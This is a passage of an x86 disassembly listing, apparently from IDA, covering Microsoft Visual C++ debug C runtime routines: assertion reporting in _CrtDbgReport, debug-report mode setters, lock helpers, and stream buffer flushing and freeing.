loc_42247A: ; CODE XREF: sub_422460+7�j
mov ecx, [ebp+arg_4]
add ecx, 20h
push ecx
call ds:dword_4F53A8 ; RtlEnterCriticalSection
loc_422487: ; CODE XREF: sub_422460+18�j
pop ebp
retn
sub_422460 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422490 proc near ; CODE XREF: sub_41BCF0+70�p
; sub_41E180+2F�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], offset off_451848
jb short loc_4224BE
cmp [ebp+arg_0], offset dword_451AA8
ja short loc_4224BE
mov eax, [ebp+arg_0]
sub eax, offset off_451848
sar eax, 5
add eax, 1Ch
push eax
call sub_423320
add esp, 4
jmp short loc_4224CB
; ---------------------------------------------------------------------------
loc_4224BE: ; CODE XREF: sub_422490+A�j
; sub_422490+13�j
mov ecx, [ebp+arg_0]
add ecx, 20h
push ecx
call ds:dword_4F53A4 ; RtlLeaveCriticalSection
loc_4224CB: ; CODE XREF: sub_422490+2C�j
pop ebp
retn
sub_422490 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4224D0 proc near ; CODE XREF: sub_422FF0+116�p
; sub_427B60+A0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_0], 14h
jge short loc_4224EA
mov eax, [ebp+arg_0]
add eax, 1Ch
push eax
call sub_423320
add esp, 4
jmp short loc_4224F7
; ---------------------------------------------------------------------------
loc_4224EA: ; CODE XREF: sub_4224D0+7�j
mov ecx, [ebp+arg_4]
add ecx, 20h
push ecx
call ds:dword_4F53A4 ; RtlLeaveCriticalSection
loc_4224F7: ; CODE XREF: sub_4224D0+18�j
pop ebp
retn
sub_4224D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422500 proc near ; CODE XREF: sub_422610+113�p
; sub_4229A0+33�p
push ebp
mov ebp, esp
call ds:dword_4F5498 ; DebugBreak
pop ebp
retn
sub_422500 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+8], 0
jl short loc_422520
cmp dword ptr [ebp+8], 3
jl short loc_422525
loc_422520: ; CODE XREF: _0:00422518�j
or eax, 0FFFFFFFFh
jmp short loc_422563
; ---------------------------------------------------------------------------
loc_422525: ; CODE XREF: _0:0042251E�j
cmp dword ptr [ebp+0Ch], 0FFFFFFFFh
jnz short loc_422537
mov eax, [ebp+8]
mov eax, ds:dword_451ACC[eax*4]
jmp short loc_422563
; ---------------------------------------------------------------------------
loc_422537: ; CODE XREF: _0:00422529�j
mov ecx, [ebp+0Ch]
and ecx, 0FFFFFFF8h
test ecx, ecx
jz short loc_422546
or eax, 0FFFFFFFFh
jmp short loc_422563
; ---------------------------------------------------------------------------
loc_422546: ; CODE XREF: _0:0042253F�j
mov edx, [ebp+8]
mov eax, ds:dword_451ACC[edx*4]
mov [ebp-4], eax
mov ecx, [ebp+8]
mov edx, [ebp+0Ch]
mov ds:dword_451ACC[ecx*4], edx
mov eax, [ebp-4]
loc_422563: ; CODE XREF: _0:00422523�j _0:00422535�j ...
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+8], 0
jl short loc_422580
cmp dword ptr [ebp+8], 3
jl short loc_422587
loc_422580: ; CODE XREF: _0:00422578�j
mov eax, 0FFFFFFFEh
jmp short loc_4225EA
; ---------------------------------------------------------------------------
loc_422587: ; CODE XREF: _0:0042257E�j
cmp dword ptr [ebp+0Ch], 0FFFFFFFAh
jnz short loc_422599
mov eax, [ebp+8]
mov eax, ds:dword_451AD8[eax*4]
jmp short loc_4225EA
; ---------------------------------------------------------------------------
loc_422599: ; CODE XREF: _0:0042258B�j
mov ecx, [ebp+8]
mov edx, ds:dword_451AD8[ecx*4]
mov [ebp-4], edx
cmp dword ptr [ebp+0Ch], 0FFFFFFFCh
jnz short loc_4225C0
push 0FFFFFFF5h
call ds:dword_4F549C ; GetStdHandle
mov ecx, [ebp+8]
mov ds:dword_451AD8[ecx*4], eax
jmp short loc_4225E7
; ---------------------------------------------------------------------------
loc_4225C0: ; CODE XREF: _0:004225AA�j
cmp dword ptr [ebp+0Ch], 0FFFFFFFBh
jnz short loc_4225DA
push 0FFFFFFF4h
call ds:dword_4F549C ; GetStdHandle
mov edx, [ebp+8]
mov ds:dword_451AD8[edx*4], eax
jmp short loc_4225E7
; ---------------------------------------------------------------------------
loc_4225DA: ; CODE XREF: _0:004225C4�j
mov eax, [ebp+8]
mov ecx, [ebp+0Ch]
mov ds:dword_451AD8[eax*4], ecx
loc_4225E7: ; CODE XREF: _0:004225BE�j _0:004225D8�j
mov eax, [ebp-4]
loc_4225EA: ; CODE XREF: _0:00422585�j _0:00422597�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4F3A10
mov [ebp-4], eax
mov ecx, [ebp+8]
mov ds:dword_4F3A10, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422610 proc near ; CODE XREF: sub_41BCF0+24�p
; sub_41BD80+2C�p ...
var_302C = dword ptr -302Ch
var_3028 = dword ptr -3028h
var_3024 = byte ptr -3024h
var_3010 = byte ptr -3010h
var_300C = dword ptr -300Ch
var_3008 = byte ptr -3008h
var_3007 = byte ptr -3007h
var_2008 = byte ptr -2008h
var_2007 = byte ptr -2007h
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_1000 = byte ptr -1000h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
push ebp
mov ebp, esp
mov eax, 302Ch
call sub_41EF80
push edi
mov [ebp+var_3008], 0
mov ecx, 3FFh
xor eax, eax
lea edi, [ebp+var_3007]
rep stosd
stosw
stosb
mov [ebp+var_2008], 0
mov ecx, 3FFh
xor eax, eax
lea edi, [ebp+var_2007]
rep stosd
stosw
stosb
mov [ebp+var_1000], 0
mov ecx, 3FFh
xor eax, eax
lea edi, [ebp+var_FFF]
rep stosd
stosw
stosb
lea eax, [ebp+arg_14]
mov [ebp+var_1004], eax
cmp [ebp+arg_0], 0
jl short loc_42267E
cmp [ebp+arg_0], 3
jl short loc_422686
loc_42267E: ; CODE XREF: sub_422610+66�j
or eax, 0FFFFFFFFh
jmp loc_42299B
; ---------------------------------------------------------------------------
loc_422686: ; CODE XREF: sub_422610+6C�j
cmp [ebp+arg_0], 2
jnz loc_422730
push offset dword_451AC8
call ds:dword_4F5488 ; InterlockedIncrement
test eax, eax
jle loc_422730
cmp ds:dword_4F3370, 0
jnz short loc_4226EE
push offset aUser32_dll_0 ; "user32.dll"
call ds:off_4F538C
mov [ebp+var_300C], eax
cmp [ebp+var_300C], 0
jz short loc_4226E6
push offset aWsprintfa ; "wsprintfA"
mov ecx, [ebp+var_300C]
push ecx
call ds:off_4F5390
mov ds:dword_4F3370, eax
cmp ds:dword_4F3370, 0
jnz short loc_4226EE
loc_4226E6: ; CODE XREF: sub_422610+B4�j
or eax, 0FFFFFFFFh
jmp loc_42299B
; ---------------------------------------------------------------------------
loc_4226EE: ; CODE XREF: sub_422610+9A�j
; sub_422610+D4�j
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
push offset aSecondChanceAs ; "Second Chance Assertion Failed: File %s"...
lea ecx, [ebp+var_2008]
push ecx
call ds:dword_4F3370
add esp, 10h
lea edx, [ebp+var_2008]
push edx
call ds:dword_4F54A0 ; OutputDebugStringA
push offset dword_451AC8
call ds:dword_4F5484 ; InterlockedDecrement
call sub_422500
or eax, 0FFFFFFFFh
jmp loc_42299B
; ---------------------------------------------------------------------------
loc_422730: ; CODE XREF: sub_422610+7A�j
; sub_422610+8D�j
cmp [ebp+arg_10], 0
jz short loc_42276D
mov eax, [ebp+var_1004]
push eax
mov ecx, [ebp+arg_10]
push ecx
push 0FEDh
lea edx, [ebp+var_1000]
push edx
call sub_41F9C0
add esp, 10h
test eax, eax
jge short loc_42276D
push offset a_crtdbgreportS ; "_CrtDbgReport: String too long or IO Er"...
lea eax, [ebp+var_1000]
push eax
call sub_41F620
add esp, 8
loc_42276D: ; CODE XREF: sub_422610+124�j
; sub_422610+147�j
cmp [ebp+arg_0], 2
jnz short loc_4227A5
cmp [ebp+arg_10], 0
jz short loc_422785
mov [ebp+var_3028], offset aAssertionFaile ; "Assertion failed: "
jmp short loc_42278F
; ---------------------------------------------------------------------------
loc_422785: ; CODE XREF: sub_422610+167�j
mov [ebp+var_3028], offset aAssertionFai_0 ; "Assertion failed!"
loc_42278F: ; CODE XREF: sub_422610+173�j
mov ecx, [ebp+var_3028]
push ecx
lea edx, [ebp+var_3008]
push edx
call sub_41F620
add esp, 8
loc_4227A5: ; CODE XREF: sub_422610+161�j
lea eax, [ebp+var_1000]
push eax
lea ecx, [ebp+var_3008]
push ecx
call sub_41F630
add esp, 8
cmp [ebp+arg_0], 2
jnz short loc_4227FA
mov edx, [ebp+arg_0]
mov eax, ds:dword_451ACC[edx*4]
and eax, 1
test eax, eax
jz short loc_4227E6
push offset asc_43CE30 ; "\r"
lea ecx, [ebp+var_3008]
push ecx
call sub_41F630
add esp, 8
loc_4227E6: ; CODE XREF: sub_422610+1C0�j
push offset asc_43CE2C ; "\n"
lea edx, [ebp+var_3008]
push edx
call sub_41F630
add esp, 8
loc_4227FA: ; CODE XREF: sub_422610+1AF�j
cmp [ebp+arg_4], 0
jz short loc_422842
lea eax, [ebp+var_3008]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
push offset aSDS ; "%s(%d) : %s"
push 1000h
lea eax, [ebp+var_2008]
push eax
call sub_41EC30
add esp, 18h
test eax, eax
jge short loc_422840
push offset a_crtdbgreportS ; "_CrtDbgReport: String too long or IO Er"...
lea ecx, [ebp+var_2008]
push ecx
call sub_41F620
add esp, 8
loc_422840: ; CODE XREF: sub_422610+21A�j
jmp short loc_422858
; ---------------------------------------------------------------------------
loc_422842: ; CODE XREF: sub_422610+1EE�j
lea edx, [ebp+var_3008]
push edx
lea eax, [ebp+var_2008]
push eax
call sub_41F620
add esp, 8
loc_422858: ; CODE XREF: sub_422610:loc_422840�j
cmp ds:dword_4F3A10, 0
jz short loc_42289C
lea ecx, [ebp+var_1008]
push ecx
lea edx, [ebp+var_2008]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F3A10
add esp, 0Ch
test eax, eax
jz short loc_42289C
cmp [ebp+arg_0], 2
jnz short loc_422891
push offset dword_451AC8
call ds:dword_4F5484 ; InterlockedDecrement
loc_422891: ; CODE XREF: sub_422610+274�j
mov eax, [ebp+var_1008]
jmp loc_42299B
; ---------------------------------------------------------------------------
loc_42289C: ; CODE XREF: sub_422610+24F�j
; sub_422610+26E�j
mov ecx, [ebp+arg_0]
mov edx, ds:dword_451ACC[ecx*4]
and edx, 1
test edx, edx
jz short loc_4228EB
mov eax, [ebp+arg_0]
cmp ds:dword_451AD8[eax*4], 0FFFFFFFFh
jz short loc_4228EB
push 0
lea ecx, [ebp+var_3010]
push ecx
lea edx, [ebp+var_2008]
push edx
call sub_41BC70
add esp, 4
push eax
lea eax, [ebp+var_2008]
push eax
mov ecx, [ebp+arg_0]
mov edx, ds:dword_451AD8[ecx*4]
push edx
call ds:dword_4F53B4 ; WriteFile
loc_4228EB: ; CODE XREF: sub_422610+29B�j
; sub_422610+2A8�j
mov eax, [ebp+arg_0]
mov ecx, ds:dword_451ACC[eax*4]
and ecx, 2
test ecx, ecx
jz short loc_422909
lea edx, [ebp+var_2008]
push edx
call ds:dword_4F54A0 ; OutputDebugStringA
loc_422909: ; CODE XREF: sub_422610+2EA�j
mov eax, [ebp+arg_0]
mov ecx, ds:dword_451ACC[eax*4]
and ecx, 4
test ecx, ecx
jz short loc_422988
cmp [ebp+arg_8], 0
jz short loc_42293D
push 0Ah
lea edx, [ebp+var_3024]
push edx
mov eax, [ebp+arg_8]
push eax
call sub_430220
add esp, 0Ch
mov [ebp+var_302C], eax
jmp short loc_422947
; ---------------------------------------------------------------------------
loc_42293D: ; CODE XREF: sub_422610+30E�j
mov [ebp+var_302C], 0
loc_422947: ; CODE XREF: sub_422610+32B�j
lea ecx, [ebp+var_1000]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+var_302C]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_4229A0
add esp, 14h
mov [ebp+var_1008], eax
cmp [ebp+arg_0], 2
jnz short loc_422980
push offset dword_451AC8
call ds:dword_4F5484 ; InterlockedDecrement
loc_422980: ; CODE XREF: sub_422610+363�j
mov eax, [ebp+var_1008]
jmp short loc_42299B
; ---------------------------------------------------------------------------
loc_422988: ; CODE XREF: sub_422610+308�j
cmp [ebp+arg_0], 2
jnz short loc_422999
push offset dword_451AC8
call ds:dword_4F5484 ; InterlockedDecrement
loc_422999: ; CODE XREF: sub_422610+37C�j
xor eax, eax
loc_42299B: ; CODE XREF: sub_422610+71�j
; sub_422610+D9�j ...
pop edi
mov esp, ebp
pop ebp
retn
sub_422610 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4229A0 proc near ; CODE XREF: sub_422610+351�p
var_1138 = dword ptr -1138h
var_1134 = dword ptr -1134h
var_1130 = dword ptr -1130h
var_112C = dword ptr -112Ch
var_1128 = dword ptr -1128h
var_1124 = dword ptr -1124h
var_1120 = dword ptr -1120h
var_111C = dword ptr -111Ch
var_1118 = dword ptr -1118h
var_1114 = dword ptr -1114h
var_1110 = dword ptr -1110h
var_110C = byte ptr -110Ch
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 1138h
call sub_41EF80
loc_4229AD: ; CODE XREF: sub_4229A0+3C�j
cmp [ebp+arg_10], 0
jnz short loc_4229D8
push offset aSzusermessageN ; "szUserMessage != NULL"
push 0
push 1DAh
push offset aDbgrpt_c ; "dbgrpt.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_4229D8
call sub_422500
loc_4229D8: ; CODE XREF: sub_4229A0+11�j
; sub_4229A0+31�j
xor eax, eax
test eax, eax
jnz short loc_4229AD
push 104h
lea ecx, [ebp+var_108]
push ecx
push 0
call ds:off_4F5344
test eax, eax
jnz short loc_422A0A
push offset aProgramNameUnk ; "<program name unknown>"
lea edx, [ebp+var_108]
push edx
call sub_41F620
add esp, 8
loc_422A0A: ; CODE XREF: sub_4229A0+54�j
lea eax, [ebp+var_108]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
push ecx
call sub_41BC70
add esp, 4
cmp eax, 40h
jbe short loc_422A4D
mov edx, [ebp+var_4]
push edx
call sub_41BC70
add esp, 4
mov ecx, [ebp+var_4]
lea edx, [ecx+eax-40h]
mov [ebp+var_4], edx
push 3
push offset a___ ; "..."
mov eax, [ebp+var_4]
push eax
call sub_41E510
add esp, 0Ch
loc_422A4D: ; CODE XREF: sub_4229A0+82�j
mov ecx, [ebp+arg_C]
mov [ebp+var_1110], ecx
cmp [ebp+var_1110], 0
jz short loc_422AA8
mov edx, [ebp+var_1110]
push edx
call sub_41BC70
add esp, 4
cmp eax, 40h
jbe short loc_422AA8
mov eax, [ebp+var_1110]
push eax
call sub_41BC70
add esp, 4
mov ecx, [ebp+var_1110]
lea edx, [ecx+eax-40h]
mov [ebp+var_1110], edx
push 3
push offset a___ ; "..."
mov eax, [ebp+var_1110]
push eax
call sub_41E510
add esp, 0Ch
loc_422AA8: ; CODE XREF: sub_4229A0+BD�j
; sub_4229A0+D1�j
cmp [ebp+arg_0], 2
jnz short loc_422ABA
mov [ebp+var_1114], offset aForInformation ; "\n\nFor information on how your program c"...
jmp short loc_422AC4
; ---------------------------------------------------------------------------
loc_422ABA: ; CODE XREF: sub_4229A0+10C�j
mov [ebp+var_1114], offset dword_43CF7C
loc_422AC4: ; CODE XREF: sub_4229A0+118�j
mov ecx, [ebp+arg_10]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_422AD9
mov eax, [ebp+arg_10]
mov [ebp+var_1118], eax
jmp short loc_422AE3
; ---------------------------------------------------------------------------
loc_422AD9: ; CODE XREF: sub_4229A0+12C�j
mov [ebp+var_1118], offset dword_43CF7C
loc_422AE3: ; CODE XREF: sub_4229A0+137�j
mov ecx, [ebp+arg_10]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_422AFF
cmp [ebp+arg_0], 2
jnz short loc_422AFF
mov [ebp+var_111C], offset aExpression ; "Expression: "
jmp short loc_422B09
; ---------------------------------------------------------------------------
loc_422AFF: ; CODE XREF: sub_4229A0+14B�j
; sub_4229A0+151�j
mov [ebp+var_111C], offset dword_43CF7C
loc_422B09: ; CODE XREF: sub_4229A0+15D�j
mov eax, [ebp+arg_10]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_422B1F
mov [ebp+var_1120], offset asc_43CF68 ; "\n\n"
jmp short loc_422B29
; ---------------------------------------------------------------------------
loc_422B1F: ; CODE XREF: sub_4229A0+171�j
mov [ebp+var_1120], offset dword_43CF7C
loc_422B29: ; CODE XREF: sub_4229A0+17D�j
cmp [ebp+arg_8], 0
jz short loc_422B3A
mov edx, [ebp+arg_8]
mov [ebp+var_1124], edx
jmp short loc_422B44
; ---------------------------------------------------------------------------
loc_422B3A: ; CODE XREF: sub_4229A0+18D�j
mov [ebp+var_1124], offset dword_43CF7C
loc_422B44: ; CODE XREF: sub_4229A0+198�j
cmp [ebp+arg_8], 0
jz short loc_422B56
mov [ebp+var_1128], offset aLine ; "\nLine: "
jmp short loc_422B60
; ---------------------------------------------------------------------------
loc_422B56: ; CODE XREF: sub_4229A0+1A8�j
mov [ebp+var_1128], offset dword_43CF7C
loc_422B60: ; CODE XREF: sub_4229A0+1B4�j
cmp [ebp+arg_4], 0
jz short loc_422B71
mov eax, [ebp+arg_4]
mov [ebp+var_112C], eax
jmp short loc_422B7B
; ---------------------------------------------------------------------------
loc_422B71: ; CODE XREF: sub_4229A0+1C4�j
mov [ebp+var_112C], offset dword_43CF7C
loc_422B7B: ; CODE XREF: sub_4229A0+1CF�j
cmp [ebp+arg_4], 0
jz short loc_422B8D
mov [ebp+var_1130], offset aFile_1 ; "\nFile: "
jmp short loc_422B97
; ---------------------------------------------------------------------------
loc_422B8D: ; CODE XREF: sub_4229A0+1DF�j
mov [ebp+var_1130], offset dword_43CF7C
loc_422B97: ; CODE XREF: sub_4229A0+1EB�j
cmp [ebp+var_1110], 0
jz short loc_422BAE
mov ecx, [ebp+var_1110]
mov [ebp+var_1134], ecx
jmp short loc_422BB8
; ---------------------------------------------------------------------------
loc_422BAE: ; CODE XREF: sub_4229A0+1FE�j
mov [ebp+var_1134], offset dword_43CF7C
loc_422BB8: ; CODE XREF: sub_4229A0+20C�j
cmp [ebp+var_1110], 0
jz short loc_422BCD
mov [ebp+var_1138], offset aModule ; "\nModule: "
jmp short loc_422BD7
; ---------------------------------------------------------------------------
loc_422BCD: ; CODE XREF: sub_4229A0+21F�j
mov [ebp+var_1138], offset dword_43CF7C
loc_422BD7: ; CODE XREF: sub_4229A0+22B�j
mov edx, [ebp+var_1114]
push edx
mov eax, [ebp+var_1118]
push eax
mov ecx, [ebp+var_111C]
push ecx
mov edx, [ebp+var_1120]
push edx
mov eax, [ebp+var_1124]
push eax
mov ecx, [ebp+var_1128]
push ecx
mov edx, [ebp+var_112C]
push edx
mov eax, [ebp+var_1130]
push eax
mov ecx, [ebp+var_1134]
push ecx
mov edx, [ebp+var_1138]
push edx
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_0]
mov edx, ds:off_451AE4[ecx*4]
push edx
push offset aDebugSProgramS ; "Debug %s!\n\nProgram: %s%s%s%s%s%s%s%s%s%"...
push 1000h
lea eax, [ebp+var_110C]
push eax
call sub_41EC30
add esp, 3Ch
test eax, eax
jge short loc_422C5D
push offset a_crtdbgreportS ; "_CrtDbgReport: String too long or IO Er"...
lea ecx, [ebp+var_110C]
push ecx
call sub_41F620
add esp, 8
loc_422C5D: ; CODE XREF: sub_4229A0+2A7�j
push 12012h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Debug Library"
lea edx, [ebp+var_110C]
push edx
call sub_430AA0
add esp, 0Ch
mov [ebp+var_10C], eax
cmp [ebp+var_10C], 3
jnz short loc_422C96
push 16h
call sub_4307E0
add esp, 4
push 3
call sub_41E8C0
loc_422C96: ; CODE XREF: sub_4229A0+2E3�j
cmp [ebp+var_10C], 4
jnz short loc_422CA6
mov eax, 1
jmp short loc_422CA8
; ---------------------------------------------------------------------------
loc_422CA6: ; CODE XREF: sub_4229A0+2FD�j
xor eax, eax
loc_422CA8: ; CODE XREF: sub_4229A0+304�j
mov esp, ebp
pop ebp
retn
sub_4229A0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422CB0 proc near ; CODE XREF: sub_41BD80+71�p
; sub_4314E0+400�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4F37C0
jnb short loc_422CE1
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jnz short loc_422CFC
loc_422CE1: ; CODE XREF: sub_422CB0+D�j
call sub_429A90
mov dword ptr [eax], 9
call sub_429AA0
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp short loc_422D26
; ---------------------------------------------------------------------------
loc_422CFC: ; CODE XREF: sub_422CB0+2F�j
mov edx, [ebp+arg_0]
push edx
call sub_431070
add esp, 4
mov eax, [ebp+arg_0]
push eax
call sub_422D30
add esp, 4
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
push ecx
call sub_431100
add esp, 4
mov eax, [ebp+var_4]
loc_422D26: ; CODE XREF: sub_422CB0+4A�j
mov esp, ebp
pop ebp
retn
sub_422CB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422D30 proc near ; CODE XREF: sub_422CB0+5C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov eax, [ebp+arg_0]
push eax
call sub_430EF0
add esp, 4
cmp eax, 0FFFFFFFFh
jz short loc_422D83
cmp [ebp+arg_0], 1
jz short loc_422D52
cmp [ebp+arg_0], 2
jnz short loc_422D6C
loc_422D52: ; CODE XREF: sub_422D30+1A�j
push 1
call sub_430EF0
add esp, 4
mov esi, eax
push 2
call sub_430EF0
add esp, 4
cmp esi, eax
jz short loc_422D83
loc_422D6C: ; CODE XREF: sub_422D30+20�j
mov ecx, [ebp+arg_0]
push ecx
call sub_430EF0
add esp, 4
push eax
call ds:off_4F533C
test eax, eax
jz short loc_422D8C
loc_422D83: ; CODE XREF: sub_422D30+14�j
; sub_422D30+3A�j
mov [ebp+var_4], 0
jmp short loc_422D95
; ---------------------------------------------------------------------------
loc_422D8C: ; CODE XREF: sub_422D30+51�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov [ebp+var_4], eax
loc_422D95: ; CODE XREF: sub_422D30+5A�j
mov edx, [ebp+arg_0]
push edx
call sub_430E10
add esp, 4
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
mov byte ptr [edx+ecx+4], 0
cmp [ebp+var_4], 0
jz short loc_422DD3
mov eax, [ebp+var_4]
push eax
call sub_4299F0
add esp, 4
or eax, 0FFFFFFFFh
jmp short loc_422DD5
; ---------------------------------------------------------------------------
loc_422DD3: ; CODE XREF: sub_422D30+90�j
xor eax, eax
loc_422DD5: ; CODE XREF: sub_422D30+A1�j
pop esi
mov esp, ebp
pop ebp
retn
sub_422D30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422DE0 proc near ; CODE XREF: sub_41BD80+62�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
loc_422DE6: ; CODE XREF: sub_422DE0+2E�j
cmp [ebp+arg_0], 0
jnz short loc_422E0A
push offset dword_43C504
push 0
push 30h
push offset a_freebuf_c ; "_freebuf.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_422E0A
int 3 ; Trap to Debugger
loc_422E0A: ; CODE XREF: sub_422DE0+A�j
; sub_422DE0+27�j
xor eax, eax
test eax, eax
jnz short loc_422DE6
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
and edx, 83h
test edx, edx
jz short loc_422E6D
mov eax, [ebp+arg_0]
mov ecx, [eax+0Ch]
and ecx, 8
test ecx, ecx
jz short loc_422E6D
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+8]
push eax
call sub_41CA10
add esp, 8
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
and edx, 0FFFFFBF7h
mov eax, [ebp+arg_0]
mov [eax+0Ch], edx
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 0
mov edx, [ebp+arg_0]
mov dword ptr [edx+8], 0
mov eax, [ebp+arg_0]
mov dword ptr [eax+4], 0
loc_422E6D: ; CODE XREF: sub_422DE0+3E�j
; sub_422DE0+4B�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_422DE0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+8], 0
jnz short loc_422E96
push 0
call sub_422FF0
add esp, 4
jmp short loc_422EC0
; ---------------------------------------------------------------------------
loc_422E96: ; CODE XREF: _0:00422E88�j
mov eax, [ebp+8]
push eax
call sub_422420
add esp, 4
mov ecx, [ebp+8]
push ecx
call sub_422ED0
add esp, 4
mov [ebp-4], eax
mov edx, [ebp+8]
push edx
call sub_422490
add esp, 4
mov eax, [ebp-4]
loc_422EC0: ; CODE XREF: _0:00422E94�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422ED0 proc near ; CODE XREF: _0:00422EA6�p
; sub_422FF0+B1�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push eax
call sub_422F20
add esp, 4
test eax, eax
jz short loc_422EE8
or eax, 0FFFFFFFFh
jmp short loc_422F0F
; ---------------------------------------------------------------------------
loc_422EE8: ; CODE XREF: sub_422ED0+11�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
and edx, 4000h
test edx, edx
jz short loc_422F0D
mov eax, [ebp+arg_0]
mov ecx, [eax+10h]
push ecx
call sub_431130
add esp, 4
neg eax
sbb eax, eax
jmp short loc_422F0F
; ---------------------------------------------------------------------------
loc_422F0D: ; CODE XREF: sub_422ED0+26�j
xor eax, eax
loc_422F0F: ; CODE XREF: sub_422ED0+16�j
; sub_422ED0+3B�j
pop ebp
retn
sub_422ED0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422F20 proc near ; CODE XREF: sub_41BD80+53�p
; sub_421050+A2�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
and edx, 3
cmp edx, 2
jnz short loc_422FBB
mov eax, [ebp+var_8]
mov ecx, [eax+0Ch]
and ecx, 108h
test ecx, ecx
jz short loc_422FBB
mov edx, [ebp+var_8]
mov eax, [ebp+var_8]
mov ecx, [edx]
sub ecx, [eax+8]
mov [ebp+var_C], ecx
cmp [ebp+var_C], 0
jle short loc_422FBB
mov edx, [ebp+var_C]
push edx
mov eax, [ebp+var_8]
mov ecx, [eax+8]
push ecx
mov edx, [ebp+var_8]
mov eax, [edx+10h]
push eax
call sub_42E940
add esp, 0Ch
cmp eax, [ebp+var_C]
jnz short loc_422FA5
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
and edx, 80h
test edx, edx
jz short loc_422FA3
mov eax, [ebp+var_8]
mov ecx, [eax+0Ch]
and ecx, 0FFFFFFFDh
mov edx, [ebp+var_8]
mov [edx+0Ch], ecx
loc_422FA3: ; CODE XREF: sub_422F20+72�j
jmp short loc_422FBB
; ---------------------------------------------------------------------------
loc_422FA5: ; CODE XREF: sub_422F20+62�j
mov eax, [ebp+var_8]
mov ecx, [eax+0Ch]
or ecx, 20h
mov edx, [ebp+var_8]
mov [edx+0Ch], ecx
mov [ebp+var_4], 0FFFFFFFFh
loc_422FBB: ; CODE XREF: sub_422F20+1F�j
; sub_422F20+2F�j ...
mov eax, [ebp+var_8]
